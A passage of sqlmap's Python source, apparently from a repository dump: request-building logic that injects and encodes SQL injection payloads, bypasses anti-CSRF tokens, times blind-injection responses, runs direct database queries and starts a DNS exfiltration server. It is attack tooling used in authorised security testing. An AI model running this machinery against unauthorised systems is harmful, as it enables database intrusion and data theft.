conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and postUrlEncode:\n                    skip = False\n\n                    if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper():\n                        if kb.choices.cookieEncode is None:\n                            msg = \"do you want to URL encode cookie values (implementation specific)? %s\" % (\"[Y/n]\" if not conf.url.endswith(\".aspx\") else \"[y/N]\")  # Reference: https://support.microsoft.com/en-us/kb/313282\n                            kb.choices.cookieEncode = readInput(msg, default='Y' if not conf.url.endswith(\".aspx\") else 'N', boolean=True)\n                        if not kb.choices.cookieEncode:\n                            skip = True\n\n                    if not skip:\n                        if place in (PLACE.POST, PLACE.CUSTOM_POST):  # potential problems in other cases (e.g. URL encoding of whole URI - including path)\n                            value = urlencode(value, spaceplus=kb.postSpaceToPlus)\n                        payload = urlencode(payload, safe='%', spaceplus=kb.postSpaceToPlus)\n                        value = agent.replacePayload(value, payload)\n                        postUrlEncode = False\n\n            if conf.hpp:\n                if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_PLATFORM.ASP, WEB_PLATFORM.ASPX)):\n                    warnMsg = \"HTTP parameter pollution should work only against \"\n                    warnMsg += \"ASP(.NET) targets\"\n                    singleTimeWarnMessage(warnMsg)\n                if place in (PLACE.GET, PLACE.POST):\n                    _ = re.escape(PAYLOAD_DELIMITER)\n                    match = re.search(r\"(?P<name>\\w+)=%s(?P<value>.+?)%s\" % (_, _), value)\n                    if match:\n                        payload = match.group(\"value\")\n\n                        for splitter in (urlencode(' '), ' '):\n                            if splitter in payload:\n                                prefix, suffix = (\"*/\", \"/*\") if splitter == ' ' else (urlencode(_) for _ in (\"*/\", \"/*\"))\n                                parts = payload.split(splitter)\n                                parts[0] = \"%s%s\" % (parts[0], suffix)\n                                parts[-1] = \"%s%s=%s%s\" % (DEFAULT_GET_POST_DELIMITER, match.group(\"name\"), prefix, parts[-1])\n                                for i in xrange(1, len(parts) - 1):\n                                    parts[i] = \"%s%s=%s%s%s\" % (DEFAULT_GET_POST_DELIMITER, match.group(\"name\"), prefix, parts[i], suffix)\n                                payload = \"\".join(parts)\n\n                        for splitter in (urlencode(','), ','):\n                            payload = payload.replace(splitter, \"%s%s=\" % (DEFAULT_GET_POST_DELIMITER, match.group(\"name\")))\n\n                        value = agent.replacePayload(value, payload)\n                else:\n                    warnMsg = \"HTTP parameter pollution works only with regular \"\n                    warnMsg += \"GET and POST parameters\"\n                    singleTimeWarnMessage(warnMsg)\n\n        if place:\n            value = agent.removePayloadDelimiters(value)\n\n        if PLACE.GET in conf.parameters:\n            get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value\n        elif place == PLACE.GET:  # Note: for (e.g.) checkWaf() when there are no GET parameters\n            get = value\n\n        if PLACE.POST in conf.parameters:\n            post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value\n        elif place == PLACE.POST:\n            post = value\n\n        if PLACE.CUSTOM_POST in conf.parameters:\n            post = conf.parameters[PLACE.CUSTOM_POST].replace(kb.customInjectionMark, \"\") if place != PLACE.CUSTOM_POST or not value else value\n            post = post.replace(ASTERISK_MARKER, '*') if post else post\n\n        if PLACE.COOKIE in conf.parameters:\n            cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value\n\n        if PLACE.USER_AGENT in conf.parameters:\n            ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value\n\n        if PLACE.REFERER in conf.parameters:\n            referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value\n\n        if PLACE.HOST in conf.parameters:\n            host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value\n\n        if PLACE.URI in conf.parameters:\n            uri = conf.url if place != PLACE.URI or not value else value\n        else:\n            uri = conf.url\n\n        if value and place == PLACE.CUSTOM_HEADER:\n            if value.split(',')[0].capitalize() == PLACE.COOKIE:\n                cookie = value.split(',', 1)[-1]\n            else:\n                auxHeaders[value.split(',')[0]] = value.split(',', 1)[-1]\n\n        if conf.csrfToken:\n            token = AttribDict()\n\n            def _adjustParameter(paramString, parameter, newValue):\n                retVal = paramString\n\n                if urlencode(parameter) in paramString:\n                    parameter = urlencode(parameter)\n\n                match = re.search(r\"%s=[^&]*\" % re.escape(parameter), paramString, re.I)\n                if match:\n                    retVal = re.sub(r\"(?i)%s\" % re.escape(match.group(0)), (\"%s=%s\" % (parameter, newValue)).replace('\\\\', r'\\\\'), paramString)\n                else:\n                    match = re.search(r\"(%s[\\\"']:[\\\"'])([^\\\"']+)\" % re.escape(parameter), paramString, re.I)\n                    if match:\n                        retVal = re.sub(r\"(?i)%s\" % re.escape(match.group(0)), \"%s%s\" % (match.group(1), newValue), paramString)\n\n                return retVal\n\n            for attempt in xrange(conf.csrfRetries + 1):\n                if token:\n                    break\n\n                if attempt > 0:\n                    warnMsg = \"unable to find anti-CSRF token '%s' at '%s'\" % (conf.csrfToken._original, conf.csrfUrl or conf.url)\n                    warnMsg += \". sqlmap is going to retry the request\"\n                    logger.warning(warnMsg)\n\n                page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.csrfMethod or (conf.method if conf.csrfUrl == conf.url else None), cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))\n                page = urldecode(page)  # for anti-CSRF tokens with special characters in their name (e.g. 'foo:bar=...')\n\n                match = re.search(r\"(?i)<input[^>]+\\bname=[\\\"']?(?P<name>%s)\\b[^>]*\\bvalue=[\\\"']?(?P<value>[^>'\\\"]*)\" % conf.csrfToken, page or \"\", re.I)\n\n                if not match:\n                    match = re.search(r\"(?i)<input[^>]+\\bvalue=[\\\"']?(?P<value>[^>'\\\"]*)[\\\"']?[^>]*\\bname=[\\\"']?(?P<name>%s)\\b\" % conf.csrfToken, page or \"\", re.I)\n\n                    if not match:\n                        match = re.search(r\"(?P<name>%s)[\\\"']:[\\\"'](?P<value>[^\\\"']+)\" % conf.csrfToken, page or \"\", re.I)\n\n                        if not match:\n                            match = re.search(r\"\\b(?P<name>%s)\\s*[:=]\\s*(?P<value>\\w+)\" % conf.csrfToken, getUnicode(headers), re.I)\n\n                            if not match:\n                                match = re.search(r\"\\b(?P<name>%s)\\s*=\\s*['\\\"]?(?P<value>[^;'\\\"]+)\" % conf.csrfToken, page or \"\", re.I)\n\n                                if not match:\n                                    match = re.search(r\"<meta\\s+name=[\\\"']?(?P<name>%s)[\\\"']?[^>]+\\b(value|content)=[\\\"']?(?P<value>[^>\\\"']+)\" % conf.csrfToken, page or \"\", re.I)\n\n                if match:\n                    token.name, token.value = match.group(\"name\"), match.group(\"value\")\n\n                    match = re.search(r\"String\\.fromCharCode\\(([\\d+, ]+)\\)\", token.value)\n                    if match:\n                        token.value = \"\".join(_unichr(int(_)) for _ in match.group(1).replace(' ', \"\").split(','))\n\n                if not token:\n                    if conf.csrfUrl and conf.csrfToken and conf.csrfUrl != conf.url and code == _http_client.OK:\n                        if headers and PLAIN_TEXT_CONTENT_TYPE in headers.get(HTTP_HEADER.CONTENT_TYPE, \"\"):\n                            token.name = conf.csrfToken\n                            token.value = page\n\n                    if not token and conf.cj and any(re.search(conf.csrfToken, _.name, re.I) for _ in conf.cj):\n                        for _ in conf.cj:\n                            if re.search(conf.csrfToken, _.name, re.I):\n                                token.name, token.value = _.name, _.value\n                                if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):\n                                    if post:\n                                        post = \"%s%s%s=%s\" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value)\n                                    elif get:\n                                        get = \"%s%s%s=%s\" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value)\n                                    else:\n                                        get = \"%s=%s\" % (token.name, token.value)\n                                break\n\n            if not token:\n                errMsg = \"anti-CSRF token '%s' can't be found at '%s'\" % (conf.csrfToken._original, conf.csrfUrl or conf.url)\n                if not conf.csrfUrl:\n                    errMsg += \". You can try to rerun by providing \"\n                    errMsg += \"a valid value for option '--csrf-url'\"\n                raise SqlmapTokenException(errMsg)\n\n            if token:\n                token.value = token.value.strip(\"'\\\"\")\n\n                for candidate in (PLACE.GET, PLACE.POST, PLACE.CUSTOM_POST, PLACE.URI):\n                    if candidate in conf.parameters:\n                        if candidate == PLACE.URI and uri:\n                            uri = _adjustParameter(uri, token.name, token.value)\n                        elif candidate == PLACE.GET and get:\n                            get = _adjustParameter(get, token.name, token.value)\n                        elif candidate in (PLACE.POST, PLACE.CUSTOM_POST) and post:\n                            post = _adjustParameter(post, token.name, token.value)\n\n                for i in xrange(len(conf.httpHeaders)):\n                    if conf.httpHeaders[i][0].lower() == token.name.lower():\n                        conf.httpHeaders[i] = (conf.httpHeaders[i][0], token.value)\n\n        if conf.rParam:\n            def _randomizeParameter(paramString, randomParameter):\n                retVal = paramString\n                match = re.search(r\"(\\A|\\b)%s=(?P<value>[^&;]*)\" % re.escape(randomParameter), paramString)\n                if match:\n                    origValue = match.group(\"value\")\n                    newValue = randomizeParameterValue(origValue) if randomParameter not in kb.randomPool else random.sample(kb.randomPool[randomParameter], 1)[0]\n                    retVal = re.sub(r\"(\\A|\\b)%s=[^&;]*\" % re.escape(randomParameter), \"%s=%s\" % (randomParameter, newValue), paramString)\n                else:\n                    match = re.search(r\"(\\A|\\b)(%s\\b[^\\w]+)(?P<value>\\w+)\" % re.escape(randomParameter), paramString)\n                    if match:\n                        origValue = match.group(\"value\")\n                        newValue = randomizeParameterValue(origValue) if randomParameter not in kb.randomPool else random.sample(kb.randomPool[randomParameter], 1)[0]\n                        retVal = paramString.replace(match.group(0), \"%s%s\" % (match.group(2), newValue))\n                return retVal\n\n            for randomParameter in conf.rParam:\n                for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.URI, PLACE.CUSTOM_POST):\n                    if item in conf.parameters:\n                        if item == PLACE.GET and get:\n                            get = _randomizeParameter(get, randomParameter)\n                        elif item in (PLACE.POST, PLACE.CUSTOM_POST) and post:\n                            post = _randomizeParameter(post, randomParameter)\n                        elif item == PLACE.COOKIE and cookie:\n                            cookie = _randomizeParameter(cookie, randomParameter)\n                        elif item == PLACE.URI and uri:\n                            uri = _randomizeParameter(uri, randomParameter)\n\n        if conf.evalCode:\n            delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER\n            variables = {\"uri\": uri, \"lastPage\": threadData.lastPage, \"_locals\": locals(), \"cookie\": cookie}\n            originals = {}\n\n            if not get and PLACE.URI in conf.parameters:\n                query = _urllib.parse.urlsplit(uri).query or \"\"\n            else:\n                query = None\n\n            for item in filterNone((get, post if not kb.postHint else None, query)):\n                for part in item.split(delimiter):\n                    if '=' in part:\n                        name, value = part.split('=', 1)\n                        name = name.strip()\n                        if safeVariableNaming(name) != name:\n                            conf.evalCode = re.sub(r\"\\b%s\\b\" % re.escape(name), safeVariableNaming(name), conf.evalCode)\n                            name = safeVariableNaming(name)\n                        value = urldecode(value, convall=True, spaceplus=(item == post and kb.postSpaceToPlus))\n                        variables[name] = value\n\n            if post and kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):\n                for name, value in (parseJson(post) or {}).items():\n                    if safeVariableNaming(name) != name:\n                        conf.evalCode = re.sub(r\"\\b%s\\b\" % re.escape(name), safeVariableNaming(name), conf.evalCode)\n                        name = safeVariableNaming(name)\n                    variables[name] = value\n\n            if cookie:\n                for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER):\n                    if '=' in part:\n                        name, value = part.split('=', 1)\n                        name = name.strip()\n                        if safeVariableNaming(name) != name:\n                            conf.evalCode = re.sub(r\"\\b%s\\b\" % re.escape(name), safeVariableNaming(name), conf.evalCode)\n                            name = safeVariableNaming(name)\n                        value = urldecode(value, convall=True)\n                        variables[name] = value\n\n            while True:\n                try:\n                    compile(getBytes(re.sub(r\"\\s*;\\s*\", \"\\n\", conf.evalCode)), \"\", \"exec\")\n                except SyntaxError as ex:\n                    if ex.text:\n                        original = replacement = ex.text.strip()\n\n                        if '=' in original:\n                            name, value = original.split('=', 1)\n                            name = name.strip()\n                            if safeVariableNaming(name) != name:\n                                replacement = re.sub(r\"\\b%s\\b\" % re.escape(name), safeVariableNaming(name), replacement)\n                        else:\n                            for _ in re.findall(r\"[A-Za-z_]+\", original)[::-1]:\n                                if safeVariableNaming(_) != _:\n                                    replacement = replacement.replace(_, safeVariableNaming(_))\n                                    break\n\n                        if original == replacement:\n                            conf.evalCode = conf.evalCode.replace(EVALCODE_ENCODED_PREFIX, \"\")\n                            break\n                        else:\n                            conf.evalCode = conf.evalCode.replace(getUnicode(ex.text.strip(), UNICODE_ENCODING), replacement)\n                    else:\n                        break\n                else:\n                    break\n\n            originals.update(variables)\n            evaluateCode(conf.evalCode, variables)\n\n            for variable in list(variables.keys()):\n                if unsafeVariableNaming(variable) != variable:\n                    value = variables[variable]\n                    del variables[variable]\n                    variables[unsafeVariableNaming(variable)] = value\n\n            uri = variables[\"uri\"]\n            cookie = variables[\"cookie\"]\n\n            for name, value in variables.items():\n                if name != \"__builtins__\" and originals.get(name, \"\") != value:\n                    if isinstance(value, (int, float, six.string_types, six.binary_type)):\n                        found = False\n                        value = getUnicode(value, UNICODE_ENCODING)\n\n                        if kb.postHint == POST_HINT.MULTIPART:\n                            boundary = \"--%s\" % re.search(r\"boundary=([^\\s]+)\", contentType).group(1)\n                            if boundary:\n                                parts = post.split(boundary)\n                                match = re.search(r'\\bname=\"%s\"' % re.escape(name), post)\n                                if not match and parts:\n                                    parts.insert(2, parts[1])\n                                    parts[2] = re.sub(r'\\bname=\"[^\"]+\".*', 'name=\"%s\"' % re.escape(name), parts[2])\n                                for i in xrange(len(parts)):\n                                    part = parts[i]\n                                    if re.search(r'\\bname=\"%s\"' % re.escape(name), part):\n                                        match = re.search(r\"(?s)\\A.+?\\r?\\n\\r?\\n\", part)\n                                        if match:\n                                            found = True\n                                            first = match.group(0)\n                                            second = part[len(first):]\n                                            second = re.sub(r\"(?s).+?(\\r?\\n?\\-*\\Z)\", r\"%s\\g<1>\" % re.escape(value), second)\n                                            parts[i] = \"%s%s\" % (first, second)\n                                post = boundary.join(parts)\n\n                        elif kb.postHint and re.search(r\"\\b%s\\b\" % re.escape(name), post or \"\"):\n                            if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP):\n                                if re.search(r\"<%s\\b\" % re.escape(name), post):\n                                    found = True\n                                    post = re.sub(r\"(?s)(<%s\\b[^>]*>)(.*?)(</%s)\" % (re.escape(name), re.escape(name)), r\"\\g<1>%s\\g<3>\" % value.replace('\\\\', r'\\\\'), post)\n                                elif re.search(r\"\\b%s>\" % re.escape(name), post):\n                                    found = True\n                                    post = re.sub(r\"(?s)(\\b%s>)(.*?)(</[^<]*\\b%s>)\" % (re.escape(name), re.escape(name)), r\"\\g<1>%s\\g<3>\" % value.replace('\\\\', r'\\\\'), post)\n\n                            elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):\n                                match = re.search(r\"['\\\"]%s['\\\"]:\" % re.escape(name), post)\n                                if match:\n                                    quote = match.group(0)[0]\n                                    post = post.replace(\"\\\\%s\" % quote, BOUNDARY_BACKSLASH_MARKER)\n                                    match = re.search(r\"(%s%s%s:\\s*)(\\d+|%s[^%s]*%s)\" % (quote, re.escape(name), quote, quote, quote, quote), post)\n                                    if match:\n                                        found = True\n                                        post = post.replace(match.group(0), \"%s%s\" % (match.group(1), value if value.isdigit() else \"%s%s%s\" % (match.group(0)[0], value, match.group(0)[0])))\n                                    post = post.replace(BOUNDARY_BACKSLASH_MARKER, \"\\\\%s\" % quote)\n\n                            regex = r\"\\b(%s)\\b([^\\w]+)(\\w+)\" % re.escape(name)\n                            if not found and re.search(regex, (post or \"\")):\n                                found = True\n                                post = re.sub(regex, r\"\\g<1>\\g<2>%s\" % value.replace('\\\\', r'\\\\'), post)\n\n                        regex = r\"((\\A|%s)%s=).+?(%s|\\Z)\" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))\n                        if not found and re.search(regex, (post or \"\")):\n                            found = True\n                            post = re.sub(regex, r\"\\g<1>%s\\g<3>\" % value.replace('\\\\', r'\\\\'), post)\n\n                        if re.search(regex, (get or \"\")):\n                            found = True\n                            get = re.sub(regex, r\"\\g<1>%s\\g<3>\" % value.replace('\\\\', r'\\\\'), get)\n\n                        if re.search(regex, (query or \"\")):\n                            found = True\n                            uri = re.sub(regex.replace(r\"\\A\", r\"\\?\"), r\"\\g<1>%s\\g<3>\" % value.replace('\\\\', r'\\\\'), uri)\n\n                        regex = r\"((\\A|%s\\s*)%s=).+?(%s|\\Z)\" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), re.escape(name), re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))\n                        if re.search(regex, (cookie or \"\")):\n                            found = True\n                            cookie = re.sub(regex, r\"\\g<1>%s\\g<3>\" % value.replace('\\\\', r'\\\\'), cookie)\n\n                        if not found:\n                            if post is not None:\n                                if kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):\n                                    match = re.search(r\"['\\\"]\", post)\n                                    if match:\n                                        quote = match.group(0)\n                                        post = re.sub(r\"\\}\\Z\", \"%s%s}\" % (',' if re.search(r\"\\w\", post) else \"\", \"%s%s%s:%s\" % (quote, name, quote, value if value.isdigit() else \"%s%s%s\" % (quote, value, quote))), post)\n                                else:\n                                    post += \"%s%s=%s\" % (delimiter, name, value)\n                            elif get is not None:\n                                get += \"%s%s=%s\" % (delimiter, name, value)\n                            elif cookie is not None:\n                                cookie += \"%s%s=%s\" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value)\n\n        if not conf.skipUrlEncode:\n            get = urlencode(get, limit=True)\n\n        if post is not None:\n            if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE):\n                post = getattr(post, UNENCODED_ORIGINAL_VALUE)\n            elif postUrlEncode:\n                post = urlencode(post, spaceplus=kb.postSpaceToPlus)\n\n        if timeBasedCompare and not conf.disableStats:\n            if len(kb.responseTimes.get(kb.responseTimeMode, [])) < MIN_TIME_RESPONSES:\n                clearConsoleLine()\n\n                kb.responseTimes.setdefault(kb.responseTimeMode, [])\n\n                if conf.tor:\n                    warnMsg = \"it's highly recommended to avoid usage of switch '--tor' for \"\n                    warnMsg += \"time-based injections because of inherent high latency time\"\n                    singleTimeWarnMessage(warnMsg)\n\n                warnMsg = \"[%s] [WARNING] %stime-based comparison requires \" % (time.strftime(\"%X\"), \"(case) \" if kb.responseTimeMode else \"\")\n                warnMsg += \"%s statistical model, please wait\" % (\"larger\" if len(kb.responseTimes) == 1 else \"reset of\")\n                dataToStdout(warnMsg)\n\n                while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES:\n                    value = kb.responseTimePayload.replace(RANDOM_INTEGER_MARKER, str(randomInt(6))).replace(RANDOM_STRING_MARKER, randomStr()) if kb.responseTimePayload else kb.responseTimePayload\n                    Connect.queryPage(value=value, content=True, raise404=False)\n                    dataToStdout('.')\n\n                dataToStdout(\" (done)\\n\")\n\n            elif not kb.testMode:\n                warnMsg = \"it is very important to not stress the network connection \"\n                warnMsg += \"during usage of time-based payloads to prevent potential \"\n                warnMsg += \"disruptions \"\n                singleTimeWarnMessage(warnMsg)\n\n            if not kb.laggingChecked:\n                kb.laggingChecked = True\n\n                deviation = stdev(kb.responseTimes[kb.responseTimeMode])\n\n                if deviation is not None and deviation > WARN_TIME_STDEV:\n                    kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE\n\n                    warnMsg = \"considerable lagging has been detected \"\n                    warnMsg += \"in connection response(s). Please use as high \"\n                    warnMsg += \"value for option '--time-sec' as possible (e.g. \"\n                    warnMsg += \"10 or more)\"\n                    logger.critical(warnMsg)\n\n        if (conf.safeFreq or 0) > 0:\n            kb.queryCounter += 1\n            if kb.queryCounter % conf.safeFreq == 0:\n                if conf.safeUrl:\n                    Connect.getPage(url=conf.safeUrl, post=conf.safePost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)\n                elif kb.safeReq:\n                    Connect.getPage(url=kb.safeReq.url, post=kb.safeReq.post, method=kb.safeReq.method, auxHeaders=kb.safeReq.headers)\n\n        start = time.time()\n\n        if kb.nullConnection and not content and not response and not timeBasedCompare:\n            noteResponseTime = False\n\n            try:\n                pushValue(kb.pageCompress)\n                kb.pageCompress = False\n\n                if kb.nullConnection == NULLCONNECTION.HEAD:\n                    method = HTTPMETHOD.HEAD\n                elif kb.nullConnection == NULLCONNECTION.RANGE:\n                    auxHeaders[HTTP_HEADER.RANGE] = \"bytes=-1\"\n\n                _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))\n\n                if headers:\n                    try:\n                        if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH):\n                            pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH].split(',')[0])\n                        elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE):\n                            pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])\n                    except ValueError:\n                        pass\n            finally:\n                kb.pageCompress = popValue()\n\n        if pageLength is None:\n            try:\n                page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)\n            except MemoryError:\n                page, headers, code = None, None, None\n                warnMsg = \"site returned insanely large response\"\n                if kb.testMode:\n                    warnMsg += \" in testing phase. This is a common \"\n                    warnMsg += \"behavior in custom WAF/IPS solutions\"\n                singleTimeWarnMessage(warnMsg)\n\n        if not ignoreSecondOrder:\n            if conf.secondUrl:\n                page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)\n            elif kb.secondReq and IPS_WAF_CHECK_PAYLOAD not in _urllib.parse.unquote(value or \"\"):\n                def _(value):\n                    if kb.customInjectionMark in (value or \"\"):\n                        if payload is None:\n                            value = value.replace(kb.customInjectionMark, \"\")\n                        else:\n                            try:\n                                value = re.sub(r\"\\w*%s\" % re.escape(kb.customInjectionMark), payload, value)\n                            except re.error:\n                                value = re.sub(r\"\\w*%s\" % re.escape(kb.customInjectionMark), re.escape(payload), value)\n                    return value\n                page, headers, code = Connect.getPage(url=_(kb.secondReq[0]), post=_(kb.secondReq[2]), method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)\n\n        threadData.lastQueryDuration = calculateDeltaSeconds(start)\n\n        kb.originalCode = code if kb.originalCode is None else kb.originalCode\n        kb.originalPage = page if kb.originalPage is None else kb.originalPage\n\n        if kb.testMode:\n            kb.testQueryCount += 1\n\n        if timeBasedCompare:\n            return wasLastResponseDelayed()\n        elif noteResponseTime:\n            kb.responseTimes.setdefault(kb.responseTimeMode, [])\n            kb.responseTimes[kb.responseTimeMode].append(threadData.lastQueryDuration)\n            if len(kb.responseTimes[kb.responseTimeMode]) > MAX_TIME_RESPONSES:\n                kb.responseTimes[kb.responseTimeMode] = kb.responseTimes[kb.responseTimeMode][-MAX_TIME_RESPONSES // 2:]\n\n        if not response and removeReflection:\n            page = removeReflectiveValues(page, payload)\n\n        kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or \"\", re.I) is not None\n\n        message = extractRegexResult(PERMISSION_DENIED_REGEX, page or \"\", re.I)\n        if message:\n            kb.permissionFlag = True\n            singleTimeWarnMessage(\"potential permission problems detected ('%s')\" % message)\n\n        headers = patchHeaders(headers)\n\n        if content or response:\n            return page, headers, code\n\n        if getRatioValue:\n            return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength)\n        else:\n            return comparison(page, headers, code, getRatioValue, pageLength)\n\ndef setHTTPHandlers():  # Cross-referenced function\n    raise NotImplementedError\n"
  },
  {
    "path": "sqlmap/lib/request/direct.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\nimport time\n\nfrom lib.core.agent import agent\nfrom lib.core.common import Backend\nfrom lib.core.common import calculateDeltaSeconds\nfrom lib.core.common import extractExpectedValue\nfrom lib.core.common import getCurrentThreadData\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.common import isListLike\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.dicts import SQL_STATEMENTS\nfrom lib.core.enums import CUSTOM_LOGGING\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import EXPECTED\nfrom lib.core.enums import TIMEOUT_STATE\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.utils.safe2bin import safecharencode\nfrom lib.utils.timeout import timeout\n\ndef direct(query, content=True):\n    select = True\n    query = agent.payloadDirect(query)\n    query = agent.adjustLateValues(query)\n    threadData = getCurrentThreadData()\n\n    if Backend.isDbms(DBMS.ORACLE) and query.upper().startswith(\"SELECT \") and \" FROM \" not in query.upper():\n        query = \"%s FROM DUAL\" % query\n\n    for sqlTitle, sqlStatements in SQL_STATEMENTS.items():\n        for sqlStatement in sqlStatements:\n            if query.lower().startswith(sqlStatement) and sqlTitle != \"SQL SELECT statement\":\n                select = False\n                break\n\n    if select:\n        if re.search(r\"(?i)\\ASELECT \", query) is None:\n            query = \"SELECT %s\" % query\n\n        if conf.binaryFields:\n            for field in conf.binaryFields:\n                field = field.strip()\n                if re.search(r\"\\b%s\\b\" % re.escape(field), query):\n                    query = re.sub(r\"\\b%s\\b\" % re.escape(field), agent.hexConvertField(field), query)\n\n    logger.log(CUSTOM_LOGGING.PAYLOAD, query)\n\n    output = hashDBRetrieve(query, True, True)\n    start = time.time()\n\n    if not select and re.search(r\"(?i)\\bEXEC \", query) is None:\n        timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None)\n    elif not (output and (\"%soutput\" % conf.tablePrefix) not in query and (\"%sfile\" % conf.tablePrefix) not in query):\n        output, state = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None)\n        if state == TIMEOUT_STATE.NORMAL:\n            hashDBWrite(query, output, True)\n        elif state == TIMEOUT_STATE.TIMEOUT:\n            conf.dbmsConnector.close()\n            conf.dbmsConnector.connect()\n    elif output:\n        infoMsg = \"resumed: %s...\" % getUnicode(output, UNICODE_ENCODING)[:20]\n        logger.info(infoMsg)\n\n    threadData.lastQueryDuration = calculateDeltaSeconds(start)\n\n    if not output:\n        return output\n    elif content:\n        if output and isListLike(output):\n            if len(output[0]) == 1:\n                output = [_[0] for _ in output]\n\n        retVal = getUnicode(output, noneToNull=True)\n        return safecharencode(retVal) if kb.safeCharEncode else retVal\n    else:\n        return extractExpectedValue(output, EXPECTED.BOOL)\n"
  },
  {
    "path": "sqlmap/lib/request/dns.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\nimport binascii\nimport os\nimport re\nimport socket\nimport struct\nimport threading\nimport time\n\nclass DNSQuery(object):\n    \"\"\"\n    >>> DNSQuery(b'|K\\\\x01 \\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x03www\\\\x06google\\\\x03com\\\\x00\\\\x00\\\\x01\\\\x00\\\\x01\\\\x00\\\\x00)\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\n\\\\x00\\\\x08O4|Np!\\\\x1d\\\\xb3')._query == b\"www.google.com.\"\n    True\n    >>> DNSQuery(b'\\\\x00')._query == b\"\"\n    True\n    \"\"\"\n\n    def __init__(self, raw):\n        self._raw = raw\n        self._query = b\"\"\n\n        try:\n            type_ = (ord(raw[2:3]) >> 3) & 15                   # Opcode bits\n\n            if type_ == 0:                                      # Standard query\n                i = 12\n                j = ord(raw[i:i + 1])\n\n                while j != 0:\n                    self._query += raw[i + 1:i + j + 1] + b'.'\n                    i = i + j + 1\n                    j = ord(raw[i:i + 1])\n        except TypeError:\n            pass\n\n    def response(self, resolution):\n        \"\"\"\n        Crafts raw DNS resolution response packet\n        \"\"\"\n\n        retVal = b\"\"\n\n        if self._query:\n            retVal += self._raw[:2]                                                         # Transaction ID\n            retVal += b\"\\x85\\x80\"                                                           # Flags (Standard query response, No error)\n            retVal += self._raw[4:6] + self._raw[4:6] + b\"\\x00\\x00\\x00\\x00\"                 # Questions and Answers Counts\n            retVal += self._raw[12:(12 + self._raw[12:].find(b\"\\x00\") + 5)]                 # Original Domain Name Query\n            retVal += b\"\\xc0\\x0c\"                                                           # 